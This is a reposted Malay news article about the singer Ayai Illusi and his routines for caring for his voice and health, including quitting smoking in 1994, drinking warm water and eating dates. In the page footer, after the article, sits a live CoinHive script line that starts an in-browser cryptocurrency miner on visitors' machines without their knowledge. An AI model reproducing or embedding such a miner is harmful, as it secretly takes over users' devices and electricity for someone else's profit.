© Copyright 2017, All Rights Reserved
Home / Hiburan / Amal petua ibu bapa | Harian Metro

Amal petua ibu bapa | Harian Metro

Sekalipun kini usianya mencecah 55 tahun, vokal penyanyi Ayai Illusi tetap mantap seperti dulu. Penyanyi yang dikenali melalui lagu Puisi Cinta itu bertuah kerana mewarisi bakat seni daripada Allahyarham ibu bapanya.

Mula dikenali bersama kumpulan Ilusi pada 1988 menerusi album Dalam Illusi, Ayai atau Zahruddin Kamaruddin tidak lokek berkongsi tip penjagaan vokalnya.

Dia akui mempunyai beberapa petua yang diamalkan sejak dulu yang dikongsi ibu bapanya ketika mereka aktif menyanyi dulu.

“Sudah lama saya amalkan petua minum satu gelas air suam setiap hari sebelum solat Subuh. Biasanya saya akan selawat kemudiannya tarik nafas sambil minum air dalam gelas itu perlahan-lahan hingga habis.

“Selain itu, setiap kali mandi saya juga pastikan kemam air dalam mulut selama lima hingga 10 minit. Saya lakukan ini setiap hari,” katanya.

Satu lagi petua yang Ayai amalkan dalam menjaga vokalnya ialah berhenti merokok.

Katanya, dia tidak merokok sejak lebih 20 tahun lalu dan akui dulu memang perokok tegar.

“Dulu setiap hari hidup saya tidak lengkap jika tidak merokok dengan jumlah banyak. Apapun, perancangan daripada Allah sangat baik. Saya nekad berhenti merokok pada 1994.

“Sebabnya sangat mudah iaitu saya kecewa dengan kekalahan pasukan beregu badminton negara yang tewas di tangan Indonesia ketika perlawanan merebut Piala Thomas tahun itu.

“Sebagai peminat sukan badminton, saya meletakkan harapan tinggi untuk pasukan negara menang tetapi tewas,” katanya.

Dengan kekalahan itu, Ayai terus menanam keazaman dalam hati untuk berhenti merokok. Dia akui tidak mudah untuk berhenti merokok kerana mengambil masa lebih empat bulan untuk bebas sepenuhnya.

“Biarpun permulaannya agak sukar, kini kesan yang saya peroleh ialah tahap kesihatan diri semakin baik termasuklah vokal saya.

“Memandangkan usia makin meningkat penjagaan pemakanan juga harus diutamakan,” katanya.

Mempunyai berat badan 74 kilogram, Ayai kini giat bersenam dan menjaga makan. Dia sedar faktor usia yang makin meningkat memerlukannya bijak menjaga rutin pemakanan harian.

“Sejak Ramadan lalu, saya amalkan kurang makan nasi dan diganti dengan kurma bersama air suam. Hingga kini, makan kurma dan minum air suam sudah menjadi rutin harian saya.

“Alhamdulillah, saya berjaya menurunkan berat badan dan kini meletakkan sasaran untuk turunkan berat badan sehingga 65 kilogram,” katanya.

Ayai yakin dengan amalan pemakanan sekarang termasuk bersenam setiap hari di rumah, ia pasti membuahkan hasil seperti diharapkan.

“Selain itu, saya juga elakkan minum ais ketul kerana tidak baik untuk kesihatan lebih-lebih lagi kepada lelaki yang melewati usia 50-an,” katanya.

Mengenai fesyen pilihan, Ayai berkata, dia menyimpan impian untuk menggayakan pakaian saiz L atau M. Sebagai selebriti, dia akui harus mengambil berat soal penampilan kerana sentiasa memenuhi undangan persembahan.

“Dengan penjagaan pemakanan sihat yang diamalkan sekarang, saya yakin ia dapat membantu untuk tampil segak.

“Apatah lagi, saya dapati ramai penyanyi lelaki meningkat usia yang masih segak dalam penampilan mereka,” katanya.

Ayai yang menghidap penyakit gout, tidak boleh tersilap makan dan harus elakkan makanan laut yang mempunyai asid urik.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Sebak hati AG ziarah kubur

PENYAMPAI radio Kool FM, AG turut meluangkan masa menziarah kubur 11 pelajar ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();